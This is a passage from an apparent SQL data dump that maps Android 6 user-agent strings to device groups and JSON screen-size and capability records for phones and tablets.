Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nexus 5X) AppleWebKit/* (KHTML, like Gecko; Google Page Speed Insights) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nexus 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nexus 6P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nexus 7) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_nexus','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nexus 9) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_nexus','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nitro_5M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nomi i5010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nomi i5011) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nomi i506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nomi_I4070) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nomi_i4510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Note 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; OK-LX4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; OK-LX6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ONE A2001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ONE A2003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ONE A2005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ONE E1001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ONE E1003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ONE E1005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ONEPLUS A3003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; OPPO A57) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; OPPO R9s Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; OPPO R9s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; OPPO R9sk) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Orange Dive 71) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Orange Neva 80) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Orange Rise32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Orange-Dive72) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Orange-Rise31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Orange-Rise31) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Orange-Rise51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P01MA) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P024) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P1 pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P10S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P1X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P2 pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P30 pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P4006A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P41_eMagic) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P7 Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P7_PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P8000 6.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P8W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P8_Energy_mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P8_eMagic) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P9000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P9000_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P9_Energy_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P9_Energy_mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; P9_Energy_mini_TM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PE-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PE-UL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PEARL A5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PEARL_A2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PGN522) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PGN523) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PGN527) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PGN528) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PGN605) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PGN610) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PGN611) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PHICOMM ENERGY 3+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PLK-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PLK-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PLK-TL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PLK-TL01H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PLK-UL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PLUM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PMT3131_3G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_prestigio_pm','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PMT3418_4GE) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_prestigio_pm','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PRD3G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PRIME) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PRO 6 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PRO 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PRO 6s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PSP3468DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.3333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PSP3510DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; PSP3511DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 